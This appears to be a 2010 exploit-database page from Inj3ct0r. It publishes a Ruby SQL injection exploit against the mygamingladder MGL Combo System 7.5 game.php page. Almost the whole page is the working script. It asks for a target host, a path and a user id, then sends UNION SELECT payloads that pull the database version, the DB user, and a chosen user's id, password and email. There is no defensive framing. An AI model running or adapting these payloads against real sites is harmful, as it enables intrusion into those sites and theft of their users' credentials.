Home / os / win7

[webapps / 0day] - mygamingladder MGL Combo System <= 7.5

Posted on 29 October 2010

<!DOCTYPE html PUBLIC '-//W3C//DTD XHTML 1.0 Strict//EN' 'http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd'><html xmlns='http://www.w3.org/1999/xhtml'><head><meta http-equiv='Content-Type' content='text/html; charset=utf-8' /><meta http-equiv='Content-Language' content='en' /><title>mygamingladder MGL Combo System &lt;= 7.5 game.php SQL injection Exploit | Inj3ct0r - exploit database : vulnerability : 0day : shellcode</title><meta name='description' content='mygamingladder MGL Combo System &lt;= 7.5 game.php SQL injection Exploit by Easy Laster in webapps / 0day | Inj3ct0r - exploit database : vulnerability : 0day : shellcode' /><link rel='shortcut icon' href='/favicon.ico' type='image/x-icon' /><link rel='alternate' type='application/rss+xml' title='Inj3ct0r RSS' href='/rss' /><script type='text/javascript'>var _gaq = _gaq || [];_gaq.push(["_setAccount", "UA-12725838-1"]);_gaq.push(["_trackPageview"]);(function(){var ga = document.createElement("script"); ga.type = "text/javascript"; ga.async = true;ga.src = ("https:" == document.location.protocol ? "https://ssl" : "http://www") + ".google-analytics.com/ga.js";var s = document.getElementsByTagName("script")[0]; s.parentNode.insertBefore(ga, s);})();</script></head><body><pre>===================================================================== mygamingladder MGL Combo System &lt;= 7.5 game.php SQL injection Exploit ===================================================================== ----------------------------Information------------------------------------------------ +Name : mygamingladder MGL Combo System &lt;= 7.5 game.php SQL injection Exploit +Autor : Easy Laster +Date : 10.10.2010 +Script : mygamingladder MGL Combo System &lt;= 7.5 +Price : 120$ +Language : PHP +Discovered by Easy Laster +Security Group 4004-Security-Project +Greetz to Team-Internet ,Underground Agents and free-hack.com +And all Friends of Cyberlive : R!p,Eddy14,Silent Vapor,Nolok, Kiba,-tmh-,Dr.ChAoS,HANN!BAL,Kabel,-=Player=-,Lidloses_Auge, N00bor,Ic3Drag0n,novaca!ne,n3w7u,Maverick010101,s0red,c1ox,enco, --------------------------------------------------------------------------------------- ___ ___ ___ ___ _ _ _____ _ _ | | | | | | |___ ___ ___ ___ _ _ ___|_| |_ _ _ ___| _ |___ ___ |_|___ ___| |_ |_ | | | | |_ |___|_ -| -_| _| | | _| | _| | |___| __| _| . | | | -_| _| _| |_|___|___| |_| |___|___|___|___|_| |_|_| |_ | |__| |_| |___|_| |___|___|_| |___| |___| ---------------------------------------------------------------------------------------- #!/usr/bin/ruby #4004-security-project.com #Discovered and vulnerability by Easy Laster print &quot; ######################################################### # 4004-Security-Project # ######################################################### # mygamingladder MGL Combo System 7.5 # # Exploit # # Using Host+Path+id # # www.demo.de /forum/ 1 # # Easy Laster # ######################################################### &quot; require &#039;net/http&#039; block = &quot;#########################################################&quot; print &quot;&quot;+ block +&quot;&quot; print &quot; Enter host name (site.com)-&gt;&quot; host=gets.chomp print &quot;&quot;+ block +&quot;&quot; print &quot; Enter script path (/path/)-&gt;&quot; path=gets.chomp print &quot;&quot;+ block +&quot;&quot; print &quot; Enter the id (id)-&gt;&quot; userid=gets.chomp print &quot;&quot;+ block +&quot;&quot; begin dir = &quot;game.php?gameid=%27/**/&quot;+ &quot;+union/**/+select+/**/1,&quot;+ &quot;2,3,CONCAT%280x23,0x23,&quot;+ &quot;0x23,0x23,0x23,version()&quot;+ &quot;,0x23,0x23,0x23,0x23,0x2&quot;+ &quot;3%29,5,6,7,8+/**/from+/&quot;+ &quot;**/users+/**/WHERE+/**/&quot;+ &quot;+id=&quot;+ userid +&quot;--+&quot; http = Net::HTTP.new(host, 80) resp= http.get(path+dir) print &quot; Version -&gt; &quot;+(/#####(.+)#####/).match(resp.body)[1] dir = &quot;game.php?gameid=%27/**/&quot;+ &quot;+union/**/+select+/**/1,&quot;+ &quot;2,3,CONCAT%280x23,0x23,&quot;+ &quot;0x23,0x23,0x23,user()&quot;+ &quot;,0x23,0x23,0x23,0x23,0x2&quot;+ &quot;3%29,5,6,7,8+/**/from+/&quot;+ &quot;**/users+/**/WHERE+/**/&quot;+ &quot;+id=&quot;+ userid +&quot;--+&quot; http = Net::HTTP.new(host, 80) resp= http.get(path+dir) print &quot; User -&gt; &quot;+(/#####(.+)#####/).match(resp.body)[1] dir = &quot;game.php?gameid=%27/**/&quot;+ &quot;+union/**/+select+/**/1,&quot;+ &quot;2,3,CONCAT%280x23,0x23,&quot;+ &quot;0x23,0x23,0x23,database()&quot;+ &quot;,0x23,0x23,0x23,0x23,0x2&quot;+ &quot;3%29,5,6,7,8+/**/from+/&quot;+ &quot;**/users+/**/WHERE+/**/&quot;+ &quot;+id=&quot;+ userid +&quot;--+&quot; http = Net::HTTP.new(host, 80) resp= http.get(path+dir) print &quot; Database -&gt; &quot;+(/#####(.+)#####/).match(resp.body)[1] dir = &quot;game.php?gameid=%27/**/&quot;+ &quot;+union/**/+select+/**/1,&quot;+ &quot;2,3,CONCAT%280x23,0x23&quot;+ &quot;,0x23,0x23,0x23,id,0x2&quot;+ &quot;3,0x23,0x23,0x23,0x23%&quot;+ &quot;29,5,6,7,8+/**/from+/*&quot;+ &quot;*/users+/**/WHERE+/**/&quot;+ &quot;id=&quot;+ userid +&quot;--+&quot; http = Net::HTTP.new(host, 80) resp= http.get(path+dir) print &quot; Id -&gt; &quot;+(/#####(.+)#####/).match(resp.body)[1] dir = &quot;game.php?gameid=%27/**/&quot;+ &quot;+union/**/+select+/**/1,&quot;+ &quot;2,3,CONCAT%280x23,0x23&quot;+ &quot;,0x23,0x23,0x23,pass,0x2&quot;+ &quot;3,0x23,0x23,0x23,0x23%&quot;+ &quot;29,5,6,7,8+/**/from+/*&quot;+ &quot;*/users+/**/WHERE+/**/&quot;+ &quot;id=&quot;+ userid +&quot;--+&quot; http = Net::HTTP.new(host, 80) resp= http.get(path+dir) print &quot; Password -&gt; &quot;+(/#####(.+)#####/).match(resp.body)[1] dir = &quot;game.php?gameid=%27/**/&quot;+ &quot;+union/**/+select+/**/1,&quot;+ &quot;2,3,CONCAT%280x23,0x23&quot;+ &quot;,0x23,0x23,0x23,email,0x2&quot;+ &quot;3,0x23,0x23,0x23,0x23%&quot;+ &quot;29,5,6,7,8+/**/from+/*&quot;+ &quot;*/users+/**/WHERE+/**/&quot;+ &quot;id=&quot;+ userid +&quot;--+&quot; http = Net::HTTP.new(host, 80) resp= http.get(path+dir) print &quot; Email -&gt; &quot;+(/#####(.+)#####/).match(resp.body)[1] print &quot; #########################################################&quot; rescue print &quot; Exploit failed&quot; end # <a href='http://inj3ct0r.com/'>Inj3ct0r.com</a> [2010-10-29]</pre></body></html>

 

TOP